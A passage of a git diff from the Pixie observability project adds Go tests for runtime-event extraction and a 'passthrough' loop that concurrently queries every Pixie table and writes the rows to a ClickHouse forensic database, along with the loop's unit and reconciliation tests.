"redis-server" { + t.Fatalf("Comm = %q", ev.Target.Comm) + } + if ev.Target.Pod != "redis-578d5dc9bd-kjj78" { + t.Fatalf("Pod = %q", ev.Target.Pod) + } + if ev.Target.Namespace != "redis" { + t.Fatalf("Namespace = %q", ev.Target.Namespace) + } + if ev.EventTime != 1744477360303026359 { + t.Fatalf("EventTime = %d", ev.EventTime) + } + if ev.RuleID != "R1005" || ev.Hostname != "node-1" { + t.Fatalf("RuleID/Hostname wrong: %+v", ev) + } +} + +// TestExtract_AllowsEmptyPodNamespace — host-pid processes (no pod) +// must still produce a valid Event. 
+func TestExtract_AllowsEmptyPodNamespace(t *testing.T) { + row := canonicalRow() + row.K8sDetails = "" // host-pid: no k8s context + ev, err := Extract(row) + if err != nil { + t.Fatalf("Extract empty-k8s row: %v", err) + } + if ev.Target.Pod != "" || ev.Target.Namespace != "" { + t.Fatalf("expected empty Pod/Namespace, got %+v", ev.Target) + } + if ev.Target.PID != 106040 || ev.Target.Comm != "redis-server" { + t.Fatalf("PID/Comm lost: %+v", ev.Target) + } + // And the hash should still compute deterministically. + if h := anomaly.Hash(ev.Target); len(h) != 32 { + t.Fatalf("hash on empty-k8s target invalid: %q", h) + } +} + +// TestExtract_StableUnderJSONReorder — re-ordering JSON keys yields +// identical Target / Event. +func TestExtract_StableUnderJSONReorder(t *testing.T) { + r := canonicalRow() + r.K8sDetails = `{"workloadKind":"Deployment","podNamespace":"redis","podName":"redis-578d5dc9bd-kjj78","clusterName":"bobexample"}` + r.ProcessDetails = `{"processTree":{"comm":"redis-server","ppid":1,"pid":106040,"cmdline":"redis-server","uid":0}}` + a, errA := Extract(canonicalRow()) + b, errB := Extract(r) + if errA != nil || errB != nil { + t.Fatalf("Extract errors: a=%v b=%v", errA, errB) + } + if a.Target != b.Target { + t.Fatalf("Target differs under JSON reorder: %+v vs %+v", a.Target, b.Target) + } + if anomaly.Hash(a.Target) != anomaly.Hash(b.Target) { + t.Fatalf("Hash differs under JSON reorder") + } +} + +// TestExtract_RequiresProcessTreeComm — empty / missing comm errors. +func TestExtract_RequiresProcessTreeComm(t *testing.T) { + for _, p := range []string{"", `{"processTree":}`, `{}`, `{"processTree":{"pid":1}}`, `{"processTree":{"comm":"","pid":1}}`} { + row := canonicalRow() + row.ProcessDetails = p + _, err := Extract(row) + if !errors.Is(err, ErrIncompleteEvent) { + t.Fatalf("proc=%q → %v, want ErrIncompleteEvent", p, err) + } + } +} + +// TestExtract_RequiresProcessTreePID — pid is required for hash uniqueness. 
+func TestExtract_RequiresProcessTreePID(t *testing.T) { + row := canonicalRow() + row.ProcessDetails = `{"processTree":{"comm":"redis-server","pid":0}}` + _, err := Extract(row) + if !errors.Is(err, ErrIncompleteEvent) { + t.Fatalf("got %v, want ErrIncompleteEvent for pid=0", err) + } +} + +// TestExtract_RequiresEventTimeAndRuleID — both required. +func TestExtract_RequiresEventTimeAndRuleID(t *testing.T) { + r := canonicalRow() + r.EventTime = 0 + if _, err := Extract(r); !errors.Is(err, ErrIncompleteEvent) { + t.Fatalf("EventTime=0 not rejected: %v", err) + } + r = canonicalRow() + r.RuleID = "" + if _, err := Extract(r); !errors.Is(err, ErrIncompleteEvent) { + t.Fatalf("RuleID='' not rejected: %v", err) + } +} diff --git a/src/vizier/services/adaptive_export/internal/passthrough/BUILD.bazel b/src/vizier/services/adaptive_export/internal/passthrough/BUILD.bazel new file mode 100644 index 00000000000..b1cb579e5be --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/passthrough/BUILD.bazel @@ -0,0 +1,47 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") +load("//bazel:pl_build_system.bzl", "pl_go_test") + +go_library( + name = "passthrough", + srcs = ["passthrough.go"], + importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/passthrough", + visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], + deps = [ + "//src/vizier/services/adaptive_export/internal/anomaly", + "//src/vizier/services/adaptive_export/internal/clickhouse", + "//src/vizier/services/adaptive_export/internal/pxl", + "//src/vizier/services/adaptive_export/internal/reconcile", + "@com_github_sirupsen_logrus//:logrus", + ], +) + +pl_go_test( + name = "passthrough_test", + srcs = [ + "compiled_test.go", + "passthrough_test.go", + "reconcile_test.go", + ], + embed = [":passthrough"], + deps = [ + "//src/vizier/services/adaptive_export/internal/clickhouse", + "//src/vizier/services/adaptive_export/internal/reconcile", + "//src/vizier/services/adaptive_export/internal/sink", + ], +) diff --git a/src/vizier/services/adaptive_export/internal/passthrough/compiled_test.go b/src/vizier/services/adaptive_export/internal/passthrough/compiled_test.go new file mode 100644 index 00000000000..25f08022154 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/passthrough/compiled_test.go @@ -0,0 +1,136 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. 
+// +// SPDX-License-Identifier: Apache-2.0 + +package passthrough + +import ( + "context" + "sort" + "sync" + "testing" + "time" +) + +// syncSink records written (table → rowcount) under a mutex so it is safe +// to assert against after the concurrent compiled tick. +type syncSink struct { + mu sync.Mutex + got map[string]int +} + +func newSyncSink() *syncSink { return &syncSink{got: map[string]int{}} } + +func (s *syncSink) WritePixieRows(_ context.Context, table string, rows []map[string]any) error { + s.mu.Lock() + defer s.mu.Unlock() + s.got[table] += len(rows) + return nil +} + +func (s *syncSink) tables() []string { + s.mu.Lock() + defer s.mu.Unlock() + out := make([]string, 0, len(s.got)) + for t := range s.got { + out = append(out, t) + } + sort.Strings(out) + return out +} + +// TestNew_ExcludesHTTP2 proves http2_messages.beta is dropped from the +// firehose set (it isn't materialised on every cluster → "Table not found" +// spam) while another dotted-but-real table (kafka_events.beta) is kept. +func TestNew_ExcludesHTTP2(t *testing.T) { + // Tables nil → defaults to clickhouse.PixieTables() which DOES list + // http2_messages.beta; New must strip it. + loop := New(tableQuerier{n: map[string]int{}}, newSyncSink(), + Config{Window: time.Minute, Compiled: true}) + + for _, tbl := range loop.cfg.Tables { + if tbl == "http2_messages.beta" { + t.Fatalf("http2_messages.beta must be excluded from passthrough tables: %v", loop.cfg.Tables) + } + } + if _, ok := loop.tmpl["http2_messages.beta"]; ok { + t.Fatalf("http2_messages.beta must not be precompiled") + } + // Sanity: a real table is still present + precompiled. + if _, ok := loop.tmpl["http_events"]; !ok { + t.Fatalf("http_events should be precompiled; tmpl=%v", loop.tmpl) + } +} + +// TestCompiledTick_WritesAllTables exercises the concurrent precompiled +// path: every table with rows must be written exactly once. (Running under +// `go test -race` also asserts the fan-out is data-race free.) 
+func TestCompiledTick_WritesAllTables(t *testing.T) { + sink := newSyncSink() + loop := New( + tableQuerier{n: map[string]int{ + "http_events": 4, + "dns_events": 2, + "conn_stats": 7, + }}, + sink, + Config{ + Window: time.Minute, + Tables: []string{"http_events", "dns_events", "conn_stats"}, + Compiled: true, + }, + ) + loop.tick(context.Background()) + + want := map[string]int{"http_events": 4, "dns_events": 2, "conn_stats": 7} + sink.mu.Lock() + defer sink.mu.Unlock() + if len(sink.got) != len(want) { + t.Fatalf("wrote %v tables, want %v", sink.got, want) + } + for tbl, n := range want { + if sink.got[tbl] != n { + t.Errorf("table %s wrote %d rows, want %d", tbl, sink.got[tbl], n) + } + } +} + +// TestCompiledTick_EqualsLegacy proves the compiled path and the legacy +// serial path write the SAME tables with the SAME row counts for identical +// inputs — the toggle changes performance/structure, not output. +func TestCompiledTick_EqualsLegacy(t *testing.T) { + rows := map[string]int{"http_events": 3, "dns_events": 5, "conn_stats": 1} + tables := []string{"http_events", "dns_events", "conn_stats"} + + run := func(compiled bool) *syncSink { + sink := newSyncSink() + New(tableQuerier{n: rows}, sink, + Config{Window: time.Minute, Tables: tables, Compiled: compiled}). 
+ tick(context.Background()) + return sink + } + + c := run(true) + l := run(false) + + if cs, ls := c.tables(), l.tables(); len(cs) != len(ls) { + t.Fatalf("compiled wrote %v, legacy wrote %v", cs, ls) + } + for tbl, n := range rows { + if c.got[tbl] != n || l.got[tbl] != n { + t.Errorf("table %s: compiled=%d legacy=%d want %d", tbl, c.got[tbl], l.got[tbl], n) + } + } +} diff --git a/src/vizier/services/adaptive_export/internal/passthrough/passthrough.go b/src/vizier/services/adaptive_export/internal/passthrough/passthrough.go new file mode 100644 index 00000000000..2e551a1907b --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/passthrough/passthrough.go @@ -0,0 +1,284 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package passthrough is the firehose-mode counterpart to the anomaly-gated +// adaptive write path. When enabled, a single background loop queries every +// pixie observation table with an empty Target (no ns/pod predicate), +// covering the configured rolling window, and writes the result via the +// existing sink. The intent is one-shot A/B measurement: compare the +// row-count + on-disk byte volume of forensic_db tables under ADAPTIVE_PASSTHROUGH=1 +// (Phase EVERYTHING) vs ADAPTIVE_PASSTHROUGH=0 (Phase AE-FILTER) under the +// same load + window, yielding the AE capture fraction per table. 
+// +// This package is intentionally minimal: no anomaly gate, no ActiveSet, no +// trigger. It reuses the same QueryFor / Adapter / Sink wiring as the rest +// of AE so the bytes-per-row shape is comparable across phases. +package passthrough + +import ( + "context" + "sync" + "time" + + log "github.com/sirupsen/logrus" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/pxl" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/reconcile" +) + +// excludedTables are dropped from the firehose table set: tables that are +// declared builtin but are not materialised on every cluster, so a +// passthrough pull against them returns a "Table not found" compilation +// error every tick (pure log spam, zero rows). http2_messages.beta is the +// known offender. Removing it here keeps the schema/DDL lists (which still +// own the table when it DOES exist) untouched. +var excludedTables = map[string]bool{ + "http2_messages.beta": true, +} + +// querier matches the cmd-side pixieAdapter wrapper (returns +// []map[string]any instead of pixieapi.Row) so the loop is decoupled +// from pxapi internals + trivially fakeable in tests. +type querier interface { + Query(ctx context.Context, src string) ([]map[string]any, error) +} + +// sink writes rows for a specific pixie table to forensic_db.
. +type sink interface { + WritePixieRows(ctx context.Context, table string, rows []map[string]any) error +} + +// Config carries the env-derived knobs. Window: the rolling lookback the +// loop's PxL covers each refresh. Refresh: cadence between loop iterations. +// Tables: which pixie tables to firehose (defaults to clickhouse.PixieTables() +// when nil/empty). +type Config struct { + Window time.Duration + Refresh time.Duration + Tables []string + // Rec records per-pull read/wrote counts (ADAPTIVE_RECONCILE). nil → + // defaulted to reconcile.Nop{} in New (instrument off). + Rec reconcile.Recorder + // Hostname is the node name stamped on reconcile rows. + Hostname string + // Compiled selects the firehose query path. When true (the default + // wired by cmd/main.go), per-table PxL is precompiled ONCE at New and + // all tables are pulled CONCURRENTLY per tick. When false, the legacy + // path is used: QueryFor rebuilds each table's PxL every tick and the + // tables are walked serially. The env var ADAPTIVE_PASSTHROUGH_COMPILED + // (cmd/main.go) flips this — set it to "false" to revert. + Compiled bool +} + +// Loop is the passthrough goroutine. +type Loop struct { + q querier + s sink + cfg Config + // tmpl holds the precompiled per-table PxL templates (table → fmt + // template with two %d time-bound verbs). Populated in New only when + // cfg.Compiled; nil otherwise. + tmpl map[string]string +} + +// New constructs a Loop. Caller-provided querier+sink must already be +// wired (cmd/main.go builds both unconditionally when ADAPTIVE_PASSTHROUGH +// is enabled). +func New(q querier, s sink, cfg Config) *Loop { + if cfg.Window <= 0 { + cfg.Window = 30 * time.Second + } + if cfg.Refresh <= 0 { + cfg.Refresh = 30 * time.Second + } + if len(cfg.Tables) == 0 { + cfg.Tables = clickhouse.PixieTables() + } + // Drop tables that aren't materialised on this cluster (e.g. + // http2_messages.beta) so they don't error every tick. 
+ cfg.Tables = filterExcluded(cfg.Tables) + if cfg.Rec == nil { + cfg.Rec = reconcile.Nop{} + } + l := &Loop{q: q, s: s, cfg: cfg} + if cfg.Compiled { + // Precompile each table's PxL once. The window is fixed for the + // lifetime of the loop, so only the per-tick time bounds vary. + l.tmpl = make(map[string]string, len(cfg.Tables)) + for _, table := range cfg.Tables { + t, err := pxl.CompilePassthrough(table, cfg.Window) + if err != nil { + // A non-builtin table can't be compiled; skip it rather + // than fail construction (matches the per-table tolerance + // of the run loop). + log.WithError(err).WithField("table", table). + Warn("ADAPTIVE_PASSTHROUGH: precompile skipped") + continue + } + l.tmpl[table] = t + } + } + return l +} + +// filterExcluded returns tables with the excludedTables entries removed, +// preserving order. +func filterExcluded(tables []string) []string { + out := tables[:0:0] + for _, t := range tables { + if excludedTables[t] { + continue + } + out = append(out, t) + } + return out +} + +// rec emits one passthrough reconciliation row (best-effort; Nop when the +// instrument is off). +func (l *Loop) rec(ctx context.Context, table string, winStart, winEnd time.Time, read, wrote int, errStr string) { + l.cfg.Rec.Record(ctx, reconcile.Row{ + TS: time.Now(), + Mode: "passthrough", + Table: table, + WinStart: winStart, + WinEnd: winEnd, + ReadCount: int64(read), + WroteCount: int64(wrote), + WriteErr: errStr, + Hostname: l.cfg.Hostname, + }) +} + +// Run blocks until ctx is cancelled. On each refresh tick the loop walks +// the configured tables, queries pixie for the window [now-Window, now) +// with no ns/pod filter, and writes the resulting rows. Individual table +// failures are logged but never break the loop — passthrough is a +// best-effort measurement workload, not the durable write path. 
+func (l *Loop) Run(ctx context.Context) { + log.WithFields(log.Fields{ + "window": l.cfg.Window, + "refresh": l.cfg.Refresh, + "tables": l.cfg.Tables, + }).Info("ADAPTIVE_PASSTHROUGH: firehose loop starting") + + // Fire immediately so the first window doesn't have to wait `Refresh`. + l.tick(ctx) + + t := time.NewTicker(l.cfg.Refresh) + defer t.Stop() + for { + select { + case <-ctx.Done(): + log.Info("ADAPTIVE_PASSTHROUGH: firehose loop stopped") + return + case <-t.C: + l.tick(ctx) + } + } +} + +// tick runs one passthrough sweep across every configured table. When +// cfg.Compiled (the default) all tables are pulled CONCURRENTLY using the +// precompiled templates; otherwise they are walked serially with QueryFor +// rebuilt per tick (legacy path, kept for rollback via the env var). +func (l *Loop) tick(ctx context.Context) { + now := time.Now() + sliceStart := now.Add(-l.cfg.Window) + sliceEnd := now + + if l.cfg.Compiled { + l.tickConcurrent(ctx, sliceStart, sliceEnd) + return + } + for _, table := range l.cfg.Tables { + if ctx.Err() != nil { + return + } + // Empty Target: namespace+pod predicates are SKIPPED inside + // QueryFor, so the PxL DataFrame returns ALL rows in the window. + // This is the bypass that makes the A/B measurement meaningful. + src, err := pxl.QueryFor(table, anomaly.Target{}, sliceStart, sliceEnd, now) + if err != nil { + log.WithError(err).WithField("table", table).Warn("ADAPTIVE_PASSTHROUGH: QueryFor failed") + l.rec(ctx, table, sliceStart, sliceEnd, 0, 0, err.Error()) + continue + } + l.pull(ctx, table, src, sliceStart, sliceEnd) + } +} + +// tickConcurrent fires every table's precompiled query at once and waits +// for all to finish. Per-table failures are isolated inside pull, so one +// table's error never affects another. 
+func (l *Loop) tickConcurrent(ctx context.Context, sliceStart, sliceEnd time.Time) { + var wg sync.WaitGroup + for _, table := range l.cfg.Tables { + if ctx.Err() != nil { + break + } + tmpl, ok := l.tmpl[table] + if !ok { + // Non-builtin table skipped at precompile time. + continue + } + src := pxl.Render(tmpl, sliceStart, sliceEnd) + wg.Add(1) + go func(table, src string) { + defer wg.Done() + l.pull(ctx, table, src, sliceStart, sliceEnd) + }(table, src) + } + wg.Wait() +} + +// pull runs one table's query, writes the rows, and records the reconcile +// row. It is safe for concurrent use across distinct tables: the querier, +// sink, and recorder are all pool/HTTP-backed and concurrency-safe, and +// each call touches a different forensic_db.
. +func (l *Loop) pull(ctx context.Context, table, src string, sliceStart, sliceEnd time.Time) { + // Bound this table's external query+write+record so a hung dependency can't + // stall the whole sweep or delay shutdown (CodeRabbit). Derived per-table + // from the parent ctx; covers both the serial and concurrent tick paths. + ctx, cancel := context.WithTimeout(ctx, l.cfg.Refresh) + defer cancel() + rows, err := l.q.Query(ctx, src) + if err != nil { + log.WithError(err).WithField("table", table).Warn("ADAPTIVE_PASSTHROUGH: pixie query failed") + l.rec(ctx, table, sliceStart, sliceEnd, 0, 0, err.Error()) + return + } + if len(rows) == 0 { + log.WithField("table", table).Debug("ADAPTIVE_PASSTHROUGH: 0 rows") + l.rec(ctx, table, sliceStart, sliceEnd, 0, 0, "") + return + } + if err := l.s.WritePixieRows(ctx, table, rows); err != nil { + log.WithError(err).WithFields(log.Fields{ + "table": table, + "rows": len(rows), + }).Warn("ADAPTIVE_PASSTHROUGH: sink write failed") + l.rec(ctx, table, sliceStart, sliceEnd, len(rows), 0, err.Error()) + return + } + log.WithFields(log.Fields{ + "table": table, + "rows": len(rows), + }).Info("ADAPTIVE_PASSTHROUGH: rows written") + l.rec(ctx, table, sliceStart, sliceEnd, len(rows), len(rows), "") +} diff --git a/src/vizier/services/adaptive_export/internal/passthrough/passthrough_test.go b/src/vizier/services/adaptive_export/internal/passthrough/passthrough_test.go new file mode 100644 index 00000000000..e1653da02a8 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/passthrough/passthrough_test.go @@ -0,0 +1,230 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. 
+// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package passthrough + +import ( + "context" + "errors" + "strings" + "sync" + "sync/atomic" + "testing" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse" +) + +type fakeQuerier struct { + mu sync.Mutex + calls []string // PxL sources received + row map[string]any + err error +} + +func (f *fakeQuerier) Query(_ context.Context, src string) ([]map[string]any, error) { + f.mu.Lock() + f.calls = append(f.calls, src) + f.mu.Unlock() + if f.err != nil { + return nil, f.err + } + return []map[string]any{f.row}, nil +} + +type fakeSink struct { + mu sync.Mutex + writes map[string]int // table → row count + failFor string +} + +func newFakeSink() *fakeSink { return &fakeSink{writes: map[string]int{}} } + +func (f *fakeSink) WritePixieRows(_ context.Context, table string, rows []map[string]any) error { + f.mu.Lock() + defer f.mu.Unlock() + if f.failFor == table { + return errors.New("fakeSink: forced failure") + } + f.writes[table] += len(rows) + return nil +} + +// TestLoop_DefaultsTablesToPixieTables — when Config.Tables is unset, the +// loop must walk every clickhouse.PixieTables() entry MINUS the passthrough +// exclusions (see excludedTables in passthrough.go — tables that aren't +// materialised on every cluster). This is the contract the A/B measurement +// depends on (a missing table silently drops a column from the capture- +// fraction matrix). 
+func TestLoop_DefaultsTablesToPixieTables(t *testing.T) { + q := &fakeQuerier{row: map[string]any{"upid": "x", "time_": time.Now()}} + s := newFakeSink() + l := New(q, s, Config{Window: 1 * time.Second, Refresh: 1 * time.Hour}) + + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + l.tick(ctx) + + expected := filterExcluded(clickhouse.PixieTables()) + if len(s.writes) != len(expected) { + t.Fatalf("wrote %d tables, want %d", len(s.writes), len(expected)) + } + for _, want := range expected { + if s.writes[want] != 1 { + t.Fatalf("table %q: wrote %d rows, want 1", want, s.writes[want]) + } + } + // And the excluded tables must NOT have been written. + for excl := range excludedTables { + if got, ok := s.writes[excl]; ok { + t.Fatalf("excluded table %q was written %d times — exclusion list out of sync with passthrough.New", excl, got) + } + } +} + +// TestLoop_EmitsEmptyTargetPxL — the firehose semantics require the PxL +// to omit the namespace/pod predicates entirely. The whole A/B +// experiment is meaningful only if the EVERYTHING phase truly does NOT +// filter rows. +func TestLoop_EmitsEmptyTargetPxL(t *testing.T) { + q := &fakeQuerier{row: map[string]any{"upid": "x", "time_": time.Now()}} + s := newFakeSink() + l := New(q, s, Config{Window: 1 * time.Second, Refresh: 1 * time.Hour}) + + l.tick(context.Background()) + + for _, src := range q.calls { + // pxl.QueryFor with empty Target writes neither "df.namespace ==" nor + // "df.pod ==" predicates. If either appears, the loop is silently + // filtering and the A/B comparison is invalid. 
+ if strings.Contains(src, "df.namespace ==") { + t.Fatalf("passthrough PxL contains namespace filter — A/B invariant broken:\n%s", src) + } + if strings.Contains(src, "df.pod ==") { + t.Fatalf("passthrough PxL contains pod filter — A/B invariant broken:\n%s", src) + } + } +} + +// TestLoop_TickContinuesPastTableFailure — a single table failing +// (query error OR sink error) must not block subsequent tables in the +// same tick. Otherwise a transient pixie 500 on http_events would +// silently drop conn_stats, redis_events, etc. from that window. +func TestLoop_TickContinuesPastTableFailure(t *testing.T) { + q := &fakeQuerier{row: map[string]any{"upid": "x", "time_": time.Now()}} + s := newFakeSink() + s.failFor = "http_events" // sink rejects the first table + l := New(q, s, Config{ + Window: 1 * time.Second, + Refresh: 1 * time.Hour, + Tables: []string{"http_events", "conn_stats", "dns_events"}, + }) + + l.tick(context.Background()) + + if s.writes["http_events"] != 0 { + t.Fatalf("http_events should NOT have written: %d rows", s.writes["http_events"]) + } + if s.writes["conn_stats"] != 1 || s.writes["dns_events"] != 1 { + t.Fatalf("tables after the failure should still write: conn_stats=%d dns_events=%d", + s.writes["conn_stats"], s.writes["dns_events"]) + } +} + +// TestLoop_RunFiresImmediately — the first tick must happen on Run +// entry (not after one Refresh). Otherwise a 30s default Refresh would +// add 30s of "AE-FILTER" baseline mixing into the EVERYTHING phase's +// first window when the operator boots into passthrough mode. 
+func TestLoop_RunFiresImmediately(t *testing.T) { + q := &fakeQuerier{row: map[string]any{"upid": "x", "time_": time.Now()}} + s := newFakeSink() + l := New(q, s, Config{ + Window: 1 * time.Second, + Refresh: 1 * time.Hour, // ensure the test fails if we wait for the ticker + Tables: []string{"http_events"}, + }) + + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + + done := make(chan struct{}) + go func() { l.Run(ctx); close(done) }() + + // Poll briefly — Run's immediate tick should land within ms. + deadline := time.After(2 * time.Second) + for { + s.mu.Lock() + got := s.writes["http_events"] + s.mu.Unlock() + if got == 1 { + break + } + select { + case <-deadline: + t.Fatalf("first tick did not fire within 2s; got %d writes", got) + case <-time.After(10 * time.Millisecond): + } + } + cancel() + <-done +} + +// TestNew_AppliesDefaults — Window/Refresh = 0 fall back to 30s, Tables +// = nil falls back to clickhouse.PixieTables() with excludedTables +// stripped (see passthrough.go for the rationale). Production cmd/main.go +// reads optional env knobs into Config; an unset env yields a zero +// duration and we must not crash with a zero ticker. +func TestNew_AppliesDefaults(t *testing.T) { + l := New(&fakeQuerier{}, newFakeSink(), Config{}) + if l.cfg.Window != 30*time.Second { + t.Fatalf("default Window = %v, want 30s", l.cfg.Window) + } + if l.cfg.Refresh != 30*time.Second { + t.Fatalf("default Refresh = %v, want 30s", l.cfg.Refresh) + } + if got, want := len(l.cfg.Tables), len(filterExcluded(clickhouse.PixieTables())); got != want { + t.Fatalf("default Tables count = %d, want %d", got, want) + } +} + +// TestLoop_RespectsContext — a cancelled context mid-tick should stop +// further table queries (we don't want a 2-min stall on SIGTERM when +// the loop has 13 tables × N-second pixie roundtrip queued up). 
+func TestLoop_RespectsContext(t *testing.T) { + var calls atomic.Int32 + q := &slowQuerier{calls: &calls} + s := newFakeSink() + l := New(q, s, Config{ + Window: 1 * time.Second, + Refresh: 1 * time.Hour, + Tables: []string{"a", "b", "c", "d", "e"}, + }) + + ctx, cancel := context.WithCancel(context.Background()) + cancel() // cancel before tick starts + l.tick(ctx) + // All tables should be skipped because ctx.Err() != nil at top of loop. + if calls.Load() != 0 { + t.Fatalf("expected 0 querier calls after cancel, got %d", calls.Load()) + } +} + +type slowQuerier struct{ calls *atomic.Int32 } + +func (s *slowQuerier) Query(_ context.Context, _ string) ([]map[string]any, error) { + s.calls.Add(1) + return nil, nil +} diff --git a/src/vizier/services/adaptive_export/internal/passthrough/reconcile_test.go b/src/vizier/services/adaptive_export/internal/passthrough/reconcile_test.go new file mode 100644 index 00000000000..44a546e82b9 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/passthrough/reconcile_test.go @@ -0,0 +1,247 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. 
+// +// SPDX-License-Identifier: Apache-2.0 + +package passthrough + +import ( + "context" + "errors" + "net/http" + "net/http/httptest" + "strings" + "sync/atomic" + "testing" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/reconcile" + sinkpkg "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink" +) + +// capRec captures every reconcile.Row for assertions. +type capRec struct{ rows []reconcile.Row } + +func (c *capRec) Record(_ context.Context, r reconcile.Row) { c.rows = append(c.rows, r) } + +// tableQuerier returns a fixed row count per pixie table, keyed by the +// `table='X'` token QueryFor embeds in the PxL. An entry of -1 means the +// query itself fails (to exercise the read-error branch). +type tableQuerier struct{ n map[string]int } + +func (q tableQuerier) Query(_ context.Context, src string) ([]map[string]any, error) { + for tbl, n := range q.n { + if strings.Contains(src, "table='"+tbl+"'") { + if n < 0 { + return nil, errors.New("boom") + } + rows := make([]map[string]any, n) + for i := range rows { + rows[i] = map[string]any{"time_": int64(i)} + } + return rows, nil + } + } + return nil, nil +} + +// failSink fails WritePixieRows for tables in `fail`, succeeds otherwise. +type failSink struct{ fail map[string]bool } + +func (s failSink) WritePixieRows(_ context.Context, table string, _ []map[string]any) error { + if s.fail[table] { + return errors.New("sink down") + } + return nil +} + +// TestTick_ReconcileRecordsReadVsWrote is the scientific check of the +// passthrough write-fidelity instrument: for every table pulled in a tick, +// exactly one reconcile.Row must be emitted, and its (ReadCount, WroteCount) +// must reflect the actual read/write outcome — the basis for localizing +// loss to query (readwrote — the exact shape a sink-drop bug + // produces, which a count-only check would miss. 
+ if r := got["conn_stats"]; r[0] <= r[1] { + t.Errorf("conn_stats read(%d) must exceed wrote(%d) on sink failure", r[0], r[1]) + } +} + +// TestNew_DefaultsRecorderToNop proves the instrument is OFF (no panic on a +// nil Recorder) unless explicitly wired. +func TestNew_DefaultsRecorderToNop(t *testing.T) { + loop := New(tableQuerier{n: map[string]int{"http_events": 1}}, failSink{}, + Config{Window: time.Second, Tables: []string{"http_events"}}) + // Must not panic with Rec unset. + loop.tick(context.Background()) +} + +// TestTick_ReconcileCatchesCHSilentDrop — the production-meaningful +// counterpart to TestTick_ReconcileRecordsReadVsWrote: replaces the +// in-process fake sink with a real sink.ClickHouseHTTP pointed at an +// httptest server that mimics CH's X-ClickHouse-Summary silent-drop +// shape (200 OK + written_rows=0 in the header). The loop must see +// the silent drop as an error (sink.summaryWroteFewerThan returns +// non-nil) and record WroteCount=0, ReadCount=N. This is the EXACT +// regression an R6 (sink-layer loss) reconcile run must detect; the +// fake-sink test only proves the wiring, this test proves the chain +// works end-to-end. +func TestTick_ReconcileCatchesCHSilentDrop(t *testing.T) { + const ( + table = "http_events" + nRows = 5 + ) + // Counter so we can assert the loop actually called the sink once + // (one tick × one table = one POST). + var posts atomic.Int32 + ch := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + posts.Add(1) + // Emulate CH's silent-drop response: 200 OK with summary that + // says "0 rows written" despite a non-empty body. AE's sink + // turns this into a Go error via summaryWroteFewerThan. 
